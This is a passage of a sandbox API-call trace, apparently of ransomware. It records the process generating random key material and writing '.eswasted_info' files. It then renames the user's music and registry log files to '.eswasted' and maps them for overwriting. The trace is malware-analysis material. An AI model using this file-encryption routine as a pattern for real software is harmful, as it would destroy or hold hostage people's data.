szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e6078) returned 1 [0080.125] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.126] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pMaybXA3lQJg.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pmaybxa3lqjg.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.126] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.127] SetEndOfFile (hFile=0xfc) returned 1 [0080.127] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.127] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.127] lstrcpyW (in: lpString1=0x4d8b18, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pMaybXA3lQJg.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pmaybxa3lqjg.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pMaybXA3lQJg.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pmaybxa3lqjg.wav.eswasted")) returned 1 [0080.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\pMaybXA3lQJg.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pmaybxa3lqjg.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.128] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.131] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e6078) returned 1 [0080.131] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.131] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.131] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e6078) returned 1 [0080.132] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.132] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.140] SetEndOfFile (hFile=0xfc) returned 1 [0080.143] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.143] CloseHandle (hObject=0xfc) returned 1 [0080.144] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8aa8 | out: hHeap=0x4a0000) returned 1 [0080.144] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e6078) returned 1 [0080.145] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.145] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.145] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SPcgQ4GuB.mp3") returned 53 [0080.145] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x274) returned 0x4d8aa8 [0080.145] lstrcpyW (in: lpString1=0x4d8b12, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.145] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.145] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e6078) returned 1 [0080.146] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.146] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SPcgQ4GuB.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\spcgq4gub.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.147] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.147] SetEndOfFile (hFile=0xfc) returned 1 [0080.148] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.148] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.148] lstrcpyW (in: lpString1=0x4d8b12, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.148] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SPcgQ4GuB.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\spcgq4gub.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SPcgQ4GuB.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\spcgq4gub.mp3.eswasted")) returned 1 [0080.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SPcgQ4GuB.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\spcgq4gub.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.149] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.149] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e6078) returned 1 [0080.150] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.150] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.150] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e6078) returned 1 [0080.151] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.151] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.159] SetEndOfFile (hFile=0xfc) returned 1 [0080.161] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.161] CloseHandle (hObject=0xfc) returned 1 [0080.163] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8aa8 | out: hHeap=0x4a0000) returned 1 [0080.163] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e6078) returned 1 [0080.164] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.164] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.164] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uLVV31WsSqUvgzXah.m4a") returned 61 [0080.164] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x284) returned 0x4d8aa8 [0080.211] lstrcpyW (in: lpString1=0x4d8b22, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.211] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0080.211] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.212] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0080.212] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uLVV31WsSqUvgzXah.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ulvv31wssquvgzxah.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.221] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.222] SetEndOfFile (hFile=0xfc) returned 1 [0080.222] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.222] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.222] lstrcpyW (in: lpString1=0x4d8b22, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uLVV31WsSqUvgzXah.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ulvv31wssquvgzxah.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uLVV31WsSqUvgzXah.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ulvv31wssquvgzxah.m4a.eswasted")) returned 1 [0080.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\uLVV31WsSqUvgzXah.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ulvv31wssquvgzxah.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.223] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.224] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.225] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.225] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.225] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.226] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.226] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.236] SetEndOfFile (hFile=0xfc) returned 1 [0080.238] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.238] CloseHandle (hObject=0xfc) returned 1 [0080.240] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8aa8 | out: hHeap=0x4a0000) returned 1 [0080.240] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0080.242] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.242] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.242] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XVDHyeMZdIBRHtZg7ofe.wav") returned 64 [0080.242] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28a) returned 0x4ef6c0 [0080.242] lstrcpyW (in: lpString1=0x4ef740, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.242] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0080.242] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0080.243] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0080.243] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XVDHyeMZdIBRHtZg7ofe.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xvdhyemzdibrhtzg7ofe.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.244] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.245] SetEndOfFile (hFile=0xfc) returned 1 [0080.245] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.245] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.245] lstrcpyW (in: lpString1=0x4ef740, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.245] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XVDHyeMZdIBRHtZg7ofe.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xvdhyemzdibrhtzg7ofe.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XVDHyeMZdIBRHtZg7ofe.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xvdhyemzdibrhtzg7ofe.wav.eswasted")) returned 1 [0080.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XVDHyeMZdIBRHtZg7ofe.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xvdhyemzdibrhtzg7ofe.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.246] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.248] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0080.249] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.249] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.249] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0080.250] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.250] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.296] SetEndOfFile (hFile=0xfc) returned 1 [0080.298] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.298] CloseHandle (hObject=0xfc) returned 1 [0080.300] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6c0 | out: hHeap=0x4a0000) returned 1 [0080.300] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e6078) returned 1 [0080.301] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.301] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.301] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_2J8OUI4UfGSeBV.m4a") returned 59 [0080.301] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x280) returned 0x4ef6c0 [0080.301] lstrcpyW (in: lpString1=0x4ef736, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.301] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.301] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e6078) returned 1 [0080.302] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.302] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_2J8OUI4UfGSeBV.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_2j8oui4ufgsebv.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.303] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.304] SetEndOfFile (hFile=0xfc) returned 1 [0080.304] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.304] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.304] lstrcpyW (in: lpString1=0x4ef736, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_2J8OUI4UfGSeBV.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_2j8oui4ufgsebv.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_2J8OUI4UfGSeBV.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_2j8oui4ufgsebv.m4a.eswasted")) returned 1 [0080.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_2J8OUI4UfGSeBV.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_2j8oui4ufgsebv.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0080.305] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0080.307] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e6078) returned 1 [0080.308] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.308] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.308] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e6078) returned 1 [0080.309] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0080.309] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.319] SetEndOfFile (hFile=0xfc) returned 1 [0080.321] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.321] CloseHandle (hObject=0xfc) returned 1 [0080.326] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6c0 | out: hHeap=0x4a0000) returned 1 [0080.327] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e6078) returned 1 [0080.327] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.327] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0080.327] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26c) returned 0x4ef6c0 [0080.328] lstrcpyW (in: lpString1=0x4ef722, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.328] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.328] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e6078) returned 1 [0080.328] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.328] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0080.329] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.330] SetEndOfFile (hFile=0xfc) returned 1 [0080.331] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.331] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0080.331] lstrcpyW (in: lpString1=0x4ef722, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.eswasted")) returned 0 [0080.331] GetLastError () returned 0x20 [0080.331] CloseHandle (hObject=0xfc) returned 1 [0080.332] lstrcpyW (in: lpString1=0x4ef722, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.332] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.eswasted_info")) returned 1 [0080.333] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6c0 | out: hHeap=0x4a0000) returned 1 [0080.333] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e6078) returned 1 [0080.334] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0080.334] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0080.334] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2bc) returned 0x4ef6c0 [0080.334] lstrcpyW (in: lpString1=0x4ef772, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.334] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.334] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e6078) returned 1 [0080.335] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.335] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0080.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 